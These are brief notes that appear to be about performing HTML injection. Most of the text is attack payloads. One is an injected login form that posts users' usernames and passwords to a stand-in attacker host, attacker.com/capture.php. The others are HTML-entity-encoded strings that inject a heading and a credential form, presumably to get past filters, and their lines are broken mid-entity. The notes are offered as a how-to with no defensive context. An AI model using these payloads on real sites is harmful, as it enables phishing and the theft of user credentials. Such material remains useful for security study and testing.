# Performing HTML injections 


Payloads 

```<form method='POST' action='http://attacker.com/capture.php' id='loginform'>
<input type='text' name='username' value=''>
<input type='password' name='password' value=''>
<input type='submit' value='submit'>
</form>```
When a user submits this form, the information is sent to an
attacker’s website http://<attacker>.com/capture.php via an action attribute
➊.


using HTML entities. 
where expected = <h1>This is a test</h1> 
can be achieved with 
&#60;&#104;&#49;&#62;&#84;&#104;&#105;&#115;&#32;&#105;&#115;&#32;&#97;&#32
;&#
116;&#101;&#115;&#116;&#60;&#47;&#104;&#49;&#62;

and 

&#85;&#115;&#101;&#114;&#110;&#97;&#109;&#101;&#58;&#60;&#98;&#114;&#62;&#1
0;&
#60;&#105;&#110;&#112;&#117;&#116;&#32;&#116;&#121;&#112;&#101;&#61;&#34;&#
116
;&#101;&#120;&#116;&#34;&#32;&#110;&#97;&#109;&#101;&#61;&#34;&#102;&#105;&
#11
4;&#115;&#116;&#110;&#97;&#109;&#101;&#34;&#62;&#10;&#60;&#98;&#114;&#62;&#
10;
&#80;&#97;&#115;&#115;&#119;&#111;&#114;&#100;&#58;&#60;&#98;&#114;&#62;&#1
0;&
#60;&#105;&#110;&#112;&#117;&#116;&#32;&#116;&#121;&#112;&#101;&#61;&#34;&#
112
;&#97;&#115;&#115;&#119;&#111;&#114;&#100;&#34;&#32;&#110;&#97;&#109;&#101;
&#6
1;&#34;&#108;&#97;&#115;&#116;&#110;&#97;&#109;&#101;&#34;&#62; 

rendered in html is 
Username:<br>
<input type="text" name="firstname">
<br>
Password:<br>
<input type="password" name="lastname">

